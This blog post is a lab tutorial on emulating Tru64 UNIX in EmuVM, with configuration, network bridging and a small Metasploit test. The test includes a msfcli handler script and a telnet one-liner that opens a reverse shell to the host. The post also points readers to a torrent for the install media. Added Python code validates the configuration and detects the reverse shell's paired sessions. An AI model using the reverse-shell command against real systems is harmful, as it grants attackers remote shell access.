Astr0baby's not so random thoughts _____ rand() % 100;

Running Tru64 UNIX inside a VM for Metasploit testing


With virtualization technology nowadays it is possible to emulate almost anything, and for those who wish to play around with not-so-common operating systems for the Alpha processor family there is a great piece of software called EmuVM, which is available for free for either Windows or Linux at emuvm.com/downloads.php

This emulator is capable of emulating a number of different Alpha servers and is probably the best choice on a modern 64-bit Linux system. I have made all my tests on Debian 64-bit with a GRSEC-patched kernel 3.6.55. There is very little information about installing and running Tru64 UNIX inside a VM, so I have decided to fill this gap with some of my findings. I will also show you how to perform some simple Metasploit operations against the Tru64 system.

So the first thing is obtaining a copy of the EmuVM software from the link above; I have used the stable version alphavm-free-1-3-9.tgz. Once unpacked there are two important files, the alphavm binary and the configuration file. Below is the configuration file I used to install Tru64 5.1B; it emulates the AlphaServer DS10 616 MHz.

Here is the example config.emu for the above model:

system {
  type = ds10_616;
  reported_type = default;
  num_cpus = 1;
  ssn = 'EmuVM-00-000-001';
  interval_clock_freq = 1000;
  memory {
    size = 512;
  }
  cpu {
    server = basic;
    jit {
      async = yes;
    }
  }
  serial com1 {
    server = socket;
    port = 3000;
  }
  serial com2 {
    server = socket;
    port = 3001;
  }
  scsi_controller qla0 {
    scsi_id = 7;
  }
  scsi_controller qla1 {
    scsi_id = 7;
  }
  scsi_disk dka0 {
    scsi_bus = 0;
    scsi_id = 0;
    scsi_lun = 0;
    file = 'disk.dd';
    caching = no;
    write_through = yes;
  }
  scsi_cdrom iso {
    scsi_id = 4;
    file = 'Tru64.iso';
  }
  ether eth0 {
    type = dec21040;
    server = dummy;
    mac_address = 0x08002B000001;
  }
  ether eth1 {
    type = dec21040;
    server = tap;
    interface = 'tap0';
    mac_address = 0x08002B000002;
  }
}

The important parts of this config file are the virtual disk location and the network card settings. I have kept all the files in the folder where the alphavm binary resides. In order to install Tru64 onto a hard disk we need to prepare a file on the host that will hold the system (2 GB is enough):

dd if=/dev/zero of=disk.dd bs=1024 count=2M

Once we have this, the next step is getting the installation media for the actual Tru64 system. If you have the CDs you can just dd them into an ISO; if not, have a look on The Pirate Bay, there is a torrent that contains the following:

-rw-r--r-- 1 user user 443 Feb 8 10:00 README.txt
-rw-r--r-- 1 user user 216601968 Feb 8 10:00 T64V51BB27AS0006_install.iso.bz2
-rw-r--r-- 1 user user 427318884 Feb 8 10:00 Tru64_5.1B_GNU_VOL1.img.bz2
-rw-r--r-- 1 user user 531119101 Feb 8 10:00 Tru64_5.1B_PORT_VOL1.img.bz2
-rw-r--r-- 1 user user 429326071 Feb 8 10:00 V5.1Br2650_A1.iso.bz2
-rw-r--r-- 1 user user 343522410 Feb 8 10:00 V5.1Br2650_A2.iso.bz2
-rw-r--r-- 1 user user 383672280 Feb 8 10:00 V5.1Br2650_O1.iso.bz2

You really only need the install ISO V5.1Br2650_O1.iso.bz2 and the patch ISO T64V51BB27AS0006_install.iso.bz2.

So once you have the ISO and the HDD file in place, boot the VM like so:

./alphavm_free config.emu

And connect to the VM machine via socat like so:

socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000

Of course you can use other programs such as telnet or PuTTY to connect, but there are problems with escape sequences in the terminal emulation; the best results for me were with socat.

user@Obelix:~/KVM/Alpha/Tru64$ ./connect.console.sh 
 Welcome to EmuVM hardware emulator.
 Copyright 2010 - 2012, Artem Alimarin. All rights reserved.
 Please visit http://emuvm.com for more information.
show devices
pka SCSI Controller
dka0 SCSI 0 14 0 0 0 0 0
dka400 SCSI 0 14 0 0 400 0 0
pkb SCSI Controller
ewa MOP 0 9 0 0 0 3 0 (08:00:2b:00:00:01)
ewb MOP 0 11 0 0 0 3 0 (08:00:2b:00:00:02)
>>>

So we first need to boot from the CD in order to install Tru64. This is done by telling the console which SCSI device to boot from; in our case it is dka400 (the CD-ROM), while dka0 is the hard disk.

boot dka400

The ISO boots into single-user mode, from which we can perform the actual installation. Anybody with some Linux/BSD/Unix background can set up the system; it is not difficult and I am not going to cover it here, simply experiment or use the default values during the installer process. Once finished you can apply the 5.1B patches from the other ISO to the installed system, but it is not necessary (they must be installed from within Tru64, as the patch CD is not bootable).

Once finished, boot from the hard disk via:

boot dka0

The most important thing is setting up the network on the host and the guest. First I will show an example of how to configure this via a simple shell script that sets up the tap0 and bridge interfaces. In my scenario I use a laptop with two network cards: one is wlan0 (wireless), the other is eth0 (Ethernet). I have decided to use the Ethernet interface for interacting with the guest VM and the wireless one for the internet connection. So here is the script that sets up the necessary interfaces:

# create a persistent tap device owned by the unprivileged user that runs alphavm
tunctl -t tap0 -u user
ifconfig tap0 up
# create the bridge, attach the physical Ethernet port and disable the forwarding delay
brctl addbr br0
brctl addif br0 eth0
brctl setfd br0 0
# eth0 gets 10.0.2.1 (the address the guest talks to), the bridge itself gets 10.0.2.2
ifconfig eth0 10.0.2.1 up
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
route add -net 0.0.0.0/0 gw 10.0.2.1
# attach the tap device to the bridge; as a bridge member it needs no address of its own
brctl addif br0 tap0
ifconfig tap0 0.0.0.0

Explanation: I set up my eth0 as 10.0.2.1 and the Tru64 VM as 10.0.2.10, so the VM and the host can communicate on this subnet. Wireless is on another subnet, but I don't plan to connect the VM to the internet. So before starting AlphaVM, run this script first to get the network working. I have used a second virtual interface in config.emu:

ether eth1 {
  type = dec21040;
  server = tap;
  interface = 'tap0';
  mac_address = 0x08002B000002;
}

The first one is just a dummy; the second one uses the tap0 interface. Make sure the guest does not use the same MAC address as the tap0 device.
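Because the disk file, the NIC settings and the MAC uniqueness are what break a boot in practice, here is an added example (my own code, not part of the post or of EmuVM) that parses the config.emu syntax as it appears above and checks those points before alphavm is started. The grammar is inferred from the file shown on this page, not from any EmuVM documentation; the sample configuration is a condensed copy of the one above, and the `host_macs` argument (the MACs of the host's own interfaces, e.g. tap0, obtained however you like) and the `exists` hook are assumptions of this example.

```python
import os
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Optional

# Constructed sample in the config.emu syntax shown in this post (condensed; not the author's exact file).
SAMPLE_CONFIG = """
system {
  type = ds10_616;
  num_cpus = 1;
  ssn = 'EmuVM-00-000-001';
  memory { size = 512; }
  cpu { server = basic; jit { async = yes; } }
  serial com1 { server = socket; port = 3000; }
  serial com2 { server = socket; port = 3001; }
  scsi_controller qla0 { scsi_id = 7; }
  scsi_disk dka0 { scsi_bus = 0; scsi_id = 0; scsi_lun = 0; file = 'disk.dd'; caching = no; write_through = yes; }
  scsi_cdrom iso { scsi_id = 4; file = 'Tru64.iso'; }
  ether eth0 { type = dec21040; server = dummy; mac_address = 0x08002B000001; }
  ether eth1 { type = dec21040; server = tap; interface = 'tap0'; mac_address = 0x08002B000002; }
}
"""

@dataclass
class Block:
    kind: str                               # 'system', 'ether', 'scsi_disk', ...
    name: Optional[str]                     # 'eth1', 'dka0'; None for memory/cpu/jit
    settings: Dict[str, str] = field(default_factory=dict)
    children: List["Block"] = field(default_factory=list)

# Tokens: single-quoted strings, the punctuation { } = ; and bare words (numbers, names, 0x... MACs).
TOKEN_RE = re.compile(r"'[^']*'|[{}=;]|[A-Za-z0-9_.\-]+")

def parse_block(tokens: List[str], pos: int):
    """Parse `kind [name] { key = value; | nested block ... }` at tokens[pos]; return (Block, next pos)."""
    kind, pos = tokens[pos], pos + 1
    name = None
    if tokens[pos] != '{':
        name, pos = tokens[pos], pos + 1
    if tokens[pos] != '{':
        raise ValueError(f"expected '{{' after {kind} {name or ''}".rstrip())
    pos += 1
    block = Block(kind, name)
    while tokens[pos] != '}':
        if tokens[pos + 1] == '=':                    # key = value ;
            key, value = tokens[pos], tokens[pos + 2]
            if tokens[pos + 3] != ';':
                raise ValueError(f"missing ';' after {key} in {kind} {name or ''}".rstrip())
            block.settings[key] = value.strip("'")    # quoted values lose their quotes
            pos += 4
        else:                                         # nested block
            child, pos = parse_block(tokens, pos)
            block.children.append(child)
    return block, pos + 1

def parse_config(text: str) -> Block:
    """Parse a whole config.emu; ValueError on unbalanced braces or stray tokens."""
    tokens = TOKEN_RE.findall(text)
    try:
        system, end = parse_block(tokens, 0)
    except IndexError:
        raise ValueError("unexpected end of input (unbalanced braces?)") from None
    if end != len(tokens):
        raise ValueError("trailing tokens after the system block")
    return system

def normalize_mac(value: str) -> str:
    """'0x08002B000002' (config.emu) or '08:00:2b:00:00:02' (ifconfig/ip style) -> 'aa:bb:cc:dd:ee:ff'."""
    digits = value.lower()
    digits = digits[2:] if digits.startswith('0x') else digits
    digits = digits.replace(':', '').replace('-', '')
    if len(digits) != 12 or any(c not in '0123456789abcdef' for c in digits):
        raise ValueError(f"not a MAC address: {value!r}")
    return ':'.join(digits[i:i + 2] for i in range(0, 12, 2))

def check_config(system: Block, exists: Callable[[str], bool] = os.path.exists,
                 host_macs: Iterable[str] = ()) -> List[str]:
    """List problems: missing disk images, MAC clashes (inside the guest or with host_macs),
    tap NICs without an interface, and console socket ports used twice."""
    problems: List[str] = []
    seen_macs = {normalize_mac(m): 'host interface' for m in host_macs}   # assumption: caller supplies these
    seen_ports: Dict[str, str] = {}
    for child in system.children:
        s, label = child.settings, f"{child.kind} {child.name}"
        if child.kind == 'ether':
            if 'mac_address' not in s:
                problems.append(f"{label}: no mac_address")
            else:
                mac = normalize_mac(s['mac_address'])
                if mac in seen_macs:
                    problems.append(f"{label}: mac_address {mac} duplicates {seen_macs[mac]}")
                else:
                    seen_macs[mac] = label
            if s.get('server') == 'tap' and 'interface' not in s:
                problems.append(f"{label}: server = tap but no interface given")
        elif child.kind in ('scsi_disk', 'scsi_cdrom'):
            if 'file' not in s:
                problems.append(f"{label}: no backing file")
            elif not exists(s['file']):
                problems.append(f"{label}: backing file '{s['file']}' not found")
        elif child.kind == 'serial' and s.get('server') == 'socket':
            port = s.get('port', '')
            if port in seen_ports:
                problems.append(f"{label}: port {port} already used by {seen_ports[port]}")
            else:
                seen_ports[port] = label
    return problems
```

Run it from the directory holding config.emu as `check_config(parse_config(open('config.emu').read()), host_macs=[...])`; an empty list means the backing files are present and no two NICs (guest or host) share a MAC, which is the situation the paragraph above asks you to verify by hand.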

On the Tru64 system I have a fixed IP address on the tu1 interface, like so:

tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>
 inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500

So now let's see how we can perform a first test on the virtual Tru64. Let's see if we can get a reverse shell. As there is very limited info about Alpha shellcode :) we are probably stuck with using something built in, like telnet or perl. A telnet reverse shell works fine. You can run a Metasploit listener on the host via this script:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
# msfcli (the old Metasploit command-line front end) starts a generic handler for the
# cmd/unix/reverse payload, listening on the host's bridge-side address and the chosen port
./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E


And run the following command on the target Tru64 system:

sh -c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh && break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1 &)'

It works well, and for our educational purposes this serves as a good example. I believe there is a book called The Shellcoder's Handbook that covers Tru64 security in one dedicated chapter. The examples there can be verified using this VM setup, and one can gain some knowledge of Tru64 Unix.
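The one-liner above needs no shellcode precisely because it leans on a stock client, and that is also what makes it visible from the defender's side: it holds two simultaneous telnet sessions from the guest to the same listener address and port, one carrying commands in and one carrying output back. Here is an added example (my own code, not part of the post) of that detection run over a constructed, simplified BSD-style `netstat -an` listing; the sample rows are made up to match the addresses used in this post and are not real Tru64 output, and the "local port below 1024 means we are the server" rule is a heuristic of this example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample in a simplified BSD-style `netstat -an` layout (not captured from a real
# Tru64 host). The guest is 10.0.2.10 and the handler host is 10.0.2.1 as in the post; the two
# sessions to 10.0.2.1.8000 are what the telnet reverse shell looks like from the guest.
SAMPLE_NETSTAT = """\
Active Internet connections
Proto Recv-Q Send-Q  Local Address         Foreign Address       (state)
tcp        0      0  10.0.2.10.23          10.0.2.1.51022        ESTABLISHED
tcp        0      0  10.0.2.10.1027        10.0.2.1.8000         ESTABLISHED
tcp        0      0  10.0.2.10.1028        10.0.2.1.8000         ESTABLISHED
tcp        0      0  10.0.2.10.1030        10.0.2.1.23           ESTABLISHED
tcp        0      0  *.23                  *.*                   LISTEN
"""

ROW_RE = re.compile(r"^(tcp\S*)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)\s*$")

def split_endpoint(endpoint: str) -> Tuple[str, Optional[int]]:
    """'10.0.2.1.8000' -> ('10.0.2.1', 8000); the wildcard '*.*' -> ('*', None)."""
    host, _, port = endpoint.rpartition('.')
    return host, (int(port) if port.isdigit() else None)

def parse_netstat(text: str) -> List[Dict]:
    """Keep only the TCP rows; banner and header lines do not match and are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            proto, local, foreign, state = m.groups()
            rows.append({'proto': proto, 'local': split_endpoint(local),
                         'foreign': split_endpoint(foreign), 'state': state})
    return rows

def find_paired_outbound(rows: List[Dict], min_sessions: int = 2,
                         expected_remote_ports: Tuple[int, ...] = (23,)) -> List[Dict]:
    """Flag remote endpoints that this host holds several concurrent client sessions to.

    The two-telnet reverse shell opens one session for input and one for output, both to the
    same listener address:port, so >= min_sessions simultaneous client sessions to one remote
    port that is not a service we normally talk to (expected_remote_ports) is the signal.
    Heuristic: a local port below 1024 means we are the server side, so the row is skipped."""
    by_remote = defaultdict(list)
    for r in rows:
        if r['state'] != 'ESTABLISHED':
            continue
        lport = r['local'][1]
        if lport is None or lport < 1024:
            continue
        by_remote[r['foreign']].append(lport)
    findings = []
    for (fhost, fport), lports in sorted(by_remote.items()):
        if len(lports) >= min_sessions and fport not in expected_remote_ports:
            findings.append({'remote': f"{fhost}:{fport}", 'local_ports': sorted(lports),
                             'reason': f"{len(lports)} concurrent client sessions to one remote port"})
    return findings
```

The rule is deliberately coarse: any client that opens parallel connections to one server (a browser to port 443, for instance) would trip it, so `expected_remote_ports` should list the services the host legitimately talks to, and on a real host you would feed it periodic `netstat -an` snapshots or flow records rather than a single listing. The same pairing is visible from the listener side, where the handler on port 8000 accepts two connections from the same guest address within a few seconds.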

Here is a little video demonstration of the above Metasploit test against Tru64
